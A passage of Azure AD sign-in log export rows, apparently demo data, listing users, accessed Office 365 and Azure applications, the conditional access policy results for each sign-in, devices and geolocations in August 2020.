'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",85789f99-3a4c-45a5-91bc-019427711100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,85789f99-3a4c-45a5-91bc-019427711100,SigninLogs,Sucess,33.7984581,-84.38828278
+95,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:11.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,090a1951-fb01-4c72-b890-7ed48df56147,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4f5563e9-cd91-4aaf-8dc5-b5eeeede1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,4f5563e9-cd91-4aaf-8dc5-b5eeeede1100,SigninLogs,Sucess,33.7984581,-84.38828278
+96,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:32.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9ddcd91f-6dfb-44fb-b724-d4bb24f5f2db,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",c95450b3-582d-4306-9dd2-9bdab89b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c95450b3-582d-4306-9dd2-9bdab89b1300,SigninLogs,Sucess,38.73078156,-78.17196655
+97,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:13.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,71cc469f-0076-0000-54b3-36e276f42244,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3c1797ce-9a4e-4e19-b7f0-81e060d51300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,3c1797ce-9a4e-4e19-b7f0-81e060d51300,SigninLogs,Sucess,41.90428925,-85.99833679
+98,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:53.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,920963ee-487f-4754-b3fe-30f69858fc29,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:41,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",4445394f-bc55-4988-8502-680d73041600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,4445394f-bc55-4988-8502-680d73041600,SigninLogs,Sucess,41.90428925,-85.99833679
+99,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:13.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0c14a9eb-aa82-4986-97ba-09a7315c061a,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e9cd98cc-4177-459a-870c-d2e4e0061400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cd98cc-4177-459a-870c-d2e4e0061400,SigninLogs,Sucess,41.90428925,-85.99833679
+100,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:10.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0bce469f-3063-0000-54b3-3f0e6bd895c6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",23bcff85-732c-47fa-be9f-91d3c8401500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,23bcff85-732c-47fa-be9f-91d3c8401500,SigninLogs,Sucess,33.7984581,-84.38828278
+101,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:16.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bfce3d6a-0f4e-49f5-ac7a-a1f8ab9f491b,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",9303d935-cf24-489a-bd00-a11c0b511500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,9303d935-cf24-489a-bd00-a11c0b511500,SigninLogs,Sucess,41.90428925,-85.99833679
+102,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:53.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:54,"{'operatingSystem': 'Windows 10', 'deviceId': 